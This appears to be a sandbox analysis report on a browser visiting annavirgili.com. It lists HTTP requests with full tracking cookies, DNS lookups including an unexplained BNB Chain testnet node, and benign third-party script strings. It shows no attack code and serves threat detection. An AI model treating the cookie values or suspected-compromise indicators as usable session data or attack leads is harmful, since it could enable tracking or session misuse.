        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/SLIDER-HOME-AVmob.jpg HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/09/Asset-2@4x.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/SLIDER-HOME-AV-scaled.jpg HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=3301862 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://annavirgili.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: I7zjddLbWUBXDuqE1/WhyA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/SLIDER-HOME-AVmob.jpg HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/SLIDER-4-scaled.jpg HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.589-1-32x32.png HTTP/1.1Host: annavirgili.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://annavirgili.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2022/10/SLIDER-HOME-AV-scaled.jpg HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.589-1-32x32.png HTTP/1.1Host: annavirgili.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004713.0.0.0; _ym_uid=1734004717472745876; _ym_d=1734004717; _hjSessionUser_3301862=eyJpZCI6IjViNzM2M2JlLWFiYmQtNWQ4Mi04Mzg2LWI0OWYyMGY3ODgzNiIsImNyZWF0ZWQiOjE3MzQwMDQ3MzA0NTYsImV4aXN0aW5nIjp0cnVlfQ==; _hjSession_3301862=eyJpZCI6ImFmMTZmMzRmLTAyNjItNGViNi1hZGM0LTFjNzYyMGQ5YzU1OCIsImMiOjE3MzQwMDQ3MzA0NTgsInMiOjEsInIiOjEsInNiIjowLCJzciI6MCwic2UiOjAsImZzIjoxLCJzcCI6MX0=; _fbp=fb.1.1734004731321.484884742687228415; _ym_isad=1
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: max-age = 3600Connection: Keep-AliveAccept: */*If-Modified-Since: Mon, 12 Feb 2024 22:07:27 GMTIf-None-Match: "65ca969f-2cd"User-Agent: Microsoft-CryptoAPI/10.0Host: x1.c.lencr.org
        Source: chromecache_474.1.drString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-673a7ee" href="https://www.facebook.com/AnnaVirgili.Official" target="_blank"> equals www.facebook.com (Facebook)
        Source: chromecache_474.1.drString found in binary or memory: src="https://www.facebook.com/tr?id=157851312877398&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
        Source: chromecache_474.1.drString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=157851312877398&amp;ev=PageView&amp;noscript=1"/></noscript> equals www.facebook.com (Facebook)
        Source: chromecache_417.1.dr, chromecache_470.1.drString found in binary or memory: (function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={url}",vk:"https://vkontakte.ru/share.php?url={url}&title={title}&description={text}&image={image}",linkedin:"https://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={text}&source={url}",odnoklassniki:"https://connect.ok.ru/offer?url={url}&title={title}&imageUrl={image}",tumblr:"https://tumblr.com/share/link?url={url}",google:"https://plus.google.com/share?url={url}",digg:"https://digg.com/submit?url={url}",reddit:"https://reddit.com/submit?url={url}&title={title}",stumbleupon:"https://www.stumbleupon.com/submit?url={url}",pocket:"https://getpocket.com/edit?url={url}",whatsapp:"https://api.whatsapp.com/send?text=*{title}*\n{text}\n{url}",xing:"https://www.xing.com/app/user?op=share&url={url}",print:"javascript:print()",email:"mailto:?subject={title}&body={text}\n{url}",telegram:"https://telegram.me/share/url?url={url}&text={text}",skype:"https://web.skype.com/share?url={url}"},ShareLink.defaultSettings={title:"",text:"",image:"",url:location.href,classPrefix:"s_",width:640,height:480},ShareLink.getNetworkLink=function(a,b){var c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,c){return b[c]||""});if("email"===a){if(-1<b.title.indexOf("&")||-1<b.text.indexOf("&")){var d={text:b.text.replace(/&/g,"%26"),title:b.title.replace(/&/g,"%26"),url:b.url};c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,b){return d[b]})}return c.indexOf("?subject=&body")&&(c=c.replace("subject=&","")),c}return c},a.fn.shareLink=function(b){return this.each(function(){a(this).data("shareLink",new ShareLink(this,b))})}})(jQuery); equals www.facebook.com (Facebook)
        Source: chromecache_417.1.dr, chromecache_470.1.drString found in binary or memory: (function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={url}",vk:"https://vkontakte.ru/share.php?url={url}&title={title}&description={text}&image={image}",linkedin:"https://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={text}&source={url}",odnoklassniki:"https://connect.ok.ru/offer?url={url}&title={title}&imageUrl={image}",tumblr:"https://tumblr.com/share/link?url={url}",google:"https://plus.google.com/share?url={url}",digg:"https://digg.com/submit?url={url}",reddit:"https://reddit.com/submit?url={url}&title={title}",stumbleupon:"https://www.stumbleupon.com/submit?url={url}",pocket:"https://getpocket.com/edit?url={url}",whatsapp:"https://api.whatsapp.com/send?text=*{title}*\n{text}\n{url}",xing:"https://www.xing.com/app/user?op=share&url={url}",print:"javascript:print()",email:"mailto:?subject={title}&body={text}\n{url}",telegram:"https://telegram.me/share/url?url={url}&text={text}",skype:"https://web.skype.com/share?url={url}"},ShareLink.defaultSettings={title:"",text:"",image:"",url:location.href,classPrefix:"s_",width:640,height:480},ShareLink.getNetworkLink=function(a,b){var c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,c){return b[c]||""});if("email"===a){if(-1<b.title.indexOf("&")||-1<b.text.indexOf("&")){var d={text:b.text.replace(/&/g,"%26"),title:b.title.replace(/&/g,"%26"),url:b.url};c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,b){return d[b]})}return c.indexOf("?subject=&body")&&(c=c.replace("subject=&","")),c}return c},a.fn.shareLink=function(b){return this.each(function(){a(this).data("shareLink",new ShareLink(this,b))})}})(jQuery); equals www.linkedin.com (Linkedin)
        Source: chromecache_417.1.dr, chromecache_470.1.drString found in binary or memory: (function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={url}",vk:"https://vkontakte.ru/share.php?url={url}&title={title}&description={text}&image={image}",linkedin:"https://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={text}&source={url}",odnoklassniki:"https://connect.ok.ru/offer?url={url}&title={title}&imageUrl={image}",tumblr:"https://tumblr.com/share/link?url={url}",google:"https://plus.google.com/share?url={url}",digg:"https://digg.com/submit?url={url}",reddit:"https://reddit.com/submit?url={url}&title={title}",stumbleupon:"https://www.stumbleupon.com/submit?url={url}",pocket:"https://getpocket.com/edit?url={url}",whatsapp:"https://api.whatsapp.com/send?text=*{title}*\n{text}\n{url}",xing:"https://www.xing.com/app/user?op=share&url={url}",print:"javascript:print()",email:"mailto:?subject={title}&body={text}\n{url}",telegram:"https://telegram.me/share/url?url={url}&text={text}",skype:"https://web.skype.com/share?url={url}"},ShareLink.defaultSettings={title:"",text:"",image:"",url:location.href,classPrefix:"s_",width:640,height:480},ShareLink.getNetworkLink=function(a,b){var c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,c){return b[c]||""});if("email"===a){if(-1<b.title.indexOf("&")||-1<b.text.indexOf("&")){var d={text:b.text.replace(/&/g,"%26"),title:b.title.replace(/&/g,"%26"),url:b.url};c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,b){return d[b]})}return c.indexOf("?subject=&body")&&(c=c.replace("subject=&","")),c}return c},a.fn.shareLink=function(b){return this.each(function(){a(this).data("shareLink",new ShareLink(this,b))})}})(jQuery); equals www.twitter.com (Twitter)
        Source: chromecache_417.1.dr, chromecache_470.1.drString found in binary or memory: (function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={url}",vk:"https://vkontakte.ru/share.php?url={url}&title={title}&description={text}&image={image}",linkedin:"https://www.linkedin.com/shareArticle?mini=true&url={url}&title={title}&summary={text}&source={url}",odnoklassniki:"https://connect.ok.ru/offer?url={url}&title={title}&imageUrl={image}",tumblr:"https://tumblr.com/share/link?url={url}",google:"https://plus.google.com/share?url={url}",digg:"https://digg.com/submit?url={url}",reddit:"https://reddit.com/submit?url={url}&title={title}",stumbleupon:"https://www.stumbleupon.com/submit?url={url}",pocket:"https://getpocket.com/edit?url={url}",whatsapp:"https://api.whatsapp.com/send?text=*{title}*\n{text}\n{url}",xing:"https://www.xing.com/app/user?op=share&url={url}",print:"javascript:print()",email:"mailto:?subject={title}&body={text}\n{url}",telegram:"https://telegram.me/share/url?url={url}&text={text}",skype:"https://web.skype.com/share?url={url}"},ShareLink.defaultSettings={title:"",text:"",image:"",url:location.href,classPrefix:"s_",width:640,height:480},ShareLink.getNetworkLink=function(a,b){var c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,c){return b[c]||""});if("email"===a){if(-1<b.title.indexOf("&")||-1<b.text.indexOf("&")){var d={text:b.text.replace(/&/g,"%26"),title:b.title.replace(/&/g,"%26"),url:b.url};c=ShareLink.networkTemplates[a].replace(/{([^}]+)}/g,function(a,b){return d[b]})}return c.indexOf("?subject=&body")&&(c=c.replace("subject=&","")),c}return c},a.fn.shareLink=function(b){return this.each(function(){a(this).data("shareLink",new ShareLink(this,b))})}})(jQuery); equals www.vkontakte.ru (VKontakte)
        Source: chromecache_299.1.dr, chromecache_432.1.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Bk:function(){e=nb()},Dd:function(){d()}}};var Vb=xa(["data-gtm-yt-inspected-"]),OD=["www.youtube.com","www.youtube-nocookie.com"],PD,QD=!1; equals www.youtube.com (Youtube)
        Source: chromecache_299.1.dr, chromecache_432.1.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Gh:e,Eh:f,Fh:g,ji:k,ki:m,Ue:n,Jb:b},q=B.YT;if(q)return q.ready&&q.ready(d),b;var r=B.onYouTubeIframeAPIReady;B.onYouTubeIframeAPIReady=function(){r&&r();d()};H(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(ZD(w,"iframe_api")||ZD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!QD&&XD(x[A],p.Ue))return mc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
        Source: chromecache_381.1.dr, chromecache_341.1.drString found in binary or memory: return b}MD.F="internal.enableAutoEventOnTimer";var Vb=xa(["data-gtm-yt-inspected-"]),OD=["www.youtube.com","www.youtube-nocookie.com"],PD,QD=!1; equals www.youtube.com (Youtube)
        Source: chromecache_330.1.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
        Source: chromecache_330.1.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
        Source: chromecache_330.1.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
        Source: global trafficDNS traffic detected: DNS query: srtb.msn.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: annavirgili.com
        Source: global trafficDNS traffic detected: DNS query: data-seed-prebsc-1-s1.bnbchain.org
        Source: global trafficDNS traffic detected: DNS query: _8545._https.data-seed-prebsc-1-s1.bnbchain.org
        Source: global trafficDNS traffic detected: DNS query: use.fontawesome.com
        Source: global trafficDNS traffic detected: DNS query: static.hotjar.com
        Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
        Source: global trafficDNS traffic detected: DNS query: mc.yandex.ru
        Source: global trafficDNS traffic detected: DNS query: mc.yandex.com
        Source: global trafficDNS traffic detected: DNS query: script.hotjar.com
        Source: global trafficDNS traffic detected: DNS query: ws.hotjar.com
        Source: global trafficDNS traffic detected: DNS query: content.hotjar.io
        Source: global trafficDNS traffic detected: DNS query: vc.hotjar.io
        Source: global trafficDNS traffic detected: DNS query: www.facebook.com
        Source: global trafficDNS traffic detected: DNS query: cxcs.microsoft.net
        Source: unknownDoH DNS queries detected: name: srtb.msn.com
        Source: unknownDoH DNS queries detected: name: cxcs.microsoft.net
        Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
        Source: chromecache_336.1.dr, chromecache_334.1.drString found in binary or memory: http://andylangton.co.uk/blog/development/get-viewport-size-width-and-height-javascript
        Source: chromecache_296.1.dr, chromecache_312.1.drString found in binary or memory: http://dev.products-filter.com/?swoof=1&woof_author=3&woof_sku&woof_text=single
        Source: chromecache_377.1.drString found in binary or memory: http://getharvest.com
        Source: chromecache_336.1.dr, chromecache_334.1.drString found in binary or memory: http://james.padolsey.com/javascript/get-document-height-cross-browser/
        Source: chromecache_382.1.dr, chromecache_340.1.drString found in binary or memory: http://jquery.org/license
        Source: chromecache_236.1.dr, chromecache_292.1.dr, chromecache_327.1.dr, chromecache_475.1.drString found in binary or memory: http://jsfiddle.net/jtbowden/xP2Ns/
        Source: chromecache_296.1.dr, chromecache_312.1.drString found in binary or memory: http://jxnblk.com/loading/
        Source: chromecache_308.1.dr, chromecache_283.1.drString found in binary or memory: http://labs.rampinteractive.co.uk/touchSwipe/
        Source: chromecache_386.1.dr, chromecache_418.1.drString found in binary or memory: http://malsup.com/jquery/block/
        Source: chromecache_424.1.dr, chromecache_463.1.drString found in binary or memory: http://ns.attribution.com/ads/1.0/
        Source: chromecache_230.1.dr, chromecache_362.1.drString found in binary or memory: http://openexchangerates.github.io/accounting.js/
        Source: chromecache_308.1.dr, chromecache_283.1.drString found in binary or memory: http://plugins.jquery.com/project/touchSwipe
        Source: chromecache_296.1.dr, chromecache_312.1.drString found in binary or memory: http://stackoverflow.com/questions/2389540/jquery-hasparent
